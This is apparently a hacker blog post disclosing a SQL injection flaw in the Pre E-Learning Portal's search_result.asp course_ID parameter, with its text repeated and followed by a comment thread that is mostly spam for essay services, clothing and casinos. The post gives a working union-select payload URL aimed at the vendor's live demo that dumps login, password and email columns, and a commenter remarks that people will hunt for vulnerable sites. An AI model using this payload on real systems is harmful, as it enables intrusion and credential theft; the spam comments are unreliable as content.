[o] Pre E-Learning Portal SQL Injection Vulnerability
Software : Pre E-Learning Portal
Vendor : http://www.preproject.com/
Demo : http://www.preprojects.com/elearning/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
[o] Vulnerable file
search_result.asp [ course_ID ]
[o] Exploit
http://localhost/elearning/search_result.asp?courses=1&course_ID=[SQL]
[o] Proof of Concept
http://www.preprojects.com/elearning/search_result.asp?courses=1&course_ID=194+and+1=0+union+all+select+1,(login%2B':'%2Bpassword%2B':'%2Bemail),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+[login]#
u cant see the result?? press ctrl+u and scroll down.. :p
big thanks to Vrs-hCk
Software : Pre E-Learning Portal
Vendor : http://www.preproject.com/
Demo : http://www.preprojects.com/elearning/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
[o] Vulnerable file
search_result.asp [ course_ID ]
[o] Exploit
http://localhost/elearning/search_result.asp?courses=1&course_ID=[SQL]
[o] Proof of Concept
http://www.preprojects.com/elearning/search_result.asp?courses=1&course_ID=194+and+1=0+union+all+select+1,(login%2B':'%2Bpassword%2B':'%2Bemail),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+[login]#
u cant see the result?? press ctrl+u and scroll down.. :p
big thanks to Vrs-hCk
Very nice. Thanks for sharing this and thanks to Vrs-hCk. I'm sure that lost of people will be happy with this.
a lost of people will be search for vulnerable site too.. :))
You sure that lost of people will be happy with this.
Unlike other your piece of writing has a zeal that matters to your readers.it works according to the needs.
Buy Assignment assignment writing Assignment Help Statistics Assignment Help pay someone to do your assignment Programming Assignment Help
Unlike other your piece of writing has a zeal that matters to your readers.it works according to the needs.
Accounting Assignment Help Computer Programming Assignment Help assignment expert assignment writing help assignment writing service Statistics Assignment Help
Good post.I am looking forward for your more useful posts.
do my assignment for me Computer Programming Assignment Help Computer Programming assignment Assignment Help UK Statistics Help UK
I have been really glad after reading this blog as the knowledge which has been given via this blog is simply tremendous. I would congratulate and appreciate the blogger for doing this much hard work.
Thanks for making such a cool post which is really very well written.I will be referring my friends about this article.Keep up your excellency and efficiency in this levels.
Dissertation Writers | dissertation proposal | buy dissertation
I feel strongly about it and love learning more on this topic. If possible, as you gain expertise, would you mind updating your blog with more information? It is extremely helpful for me.
Very informative. I really enjoyed while reading your post.
Debt Relief
This information is very good for me . Very spacial thanks to Author of this article
nice post
civil engineering assignment help
c++ assignment help
maths assignment help
mechanical engineering assignment help
chemical engineering assignment
economics assignment help
good to read this article, this is very informative for me.
this post is very informative and helpful for me.i am happy to see this effort and great knowledge about subject.
essay writers custom essays writing
This is winter jackets a really excellent study for me, Must acknowledge that you are one of the best web owners I ever saw. winter coats
Well that's Pre E-Learning Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Teamwear Football
I just revenge of the fallen jacket discovered your website and desired to say that I have really experienced surfing around your posts shia la beouf clothing
When i found your current weblog site on the search engines and also test just a few within your quick discussions. Proceed to maintain upward this very good use. When i simply additional upward your current Feed for you to my own WINDOWS LIVE MESSENGER Information Viewer.
Well the Pre E-Learning Portal is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the search_result.asp script using the course_ID parameter.
Athletic Clothing | Mens Golf Apparel | Adidas Polo | Izod
The SQL injection vulnerability in search_result.asp in Pre Projects Pre E-Learning Portal allows remote attackers to execute arbitrary SQL commands via the course_ID parameter. thanks for the share the sharing this great and very informative post with us.
Where to Sell Gold | Cash Gold | Price of gold per gram
like your post.
Nice post to share.
I believe this is a great site, you are working great on the content and quality of this site at the same time.
This really is an awesome post, I’m happy I recently found.I am looking forward for your next post.
essay writing service in uk
I hardly ever write comments on blogs, but your article urged me to praise your blog. Thanks for the read, I will surely favorite your site and check in occasionally.
essay writing help | essay writing service | cheap essay writing | affordable essay writing
This blog is interesting for me..!
__________________
Essay Writing | Custom Essay Writing | Custom Thesis Writing || Custom Dissertation Writing | Custom Essay Writing Services | Dissertation Writing
Awesome content, beneficial give good results, now I am aware that which you guys have been doing all this time.
do my essay for me | write my essay
Great post... very informative for me. Thanks for sharing.
__________________________
Cheap Essay | Essay Blog
I am really love your website, it is so great. Of course, welcome to visit our website too.
-----------------------
Online Essay
Primary focus of our company is on providing custom written essays. It is our aim to provide you with personalized academic assistance in preparing dissertation proposals, theses, literature reviews, MBA projects or reports.
UK Essay Writing
Hi Nice post
marketing assignment help
dissertation help
the large majority of excellent blogging site http://freeonlinecasinogamesx.webs.com online casino games
really impressive article. thanks for sharing.
dissertation | thesis paper | writing services | essay | assignment | term paper | research paper help | blog | web content | thesis paper
cheap mlb jerseys
cheap baseball jerseys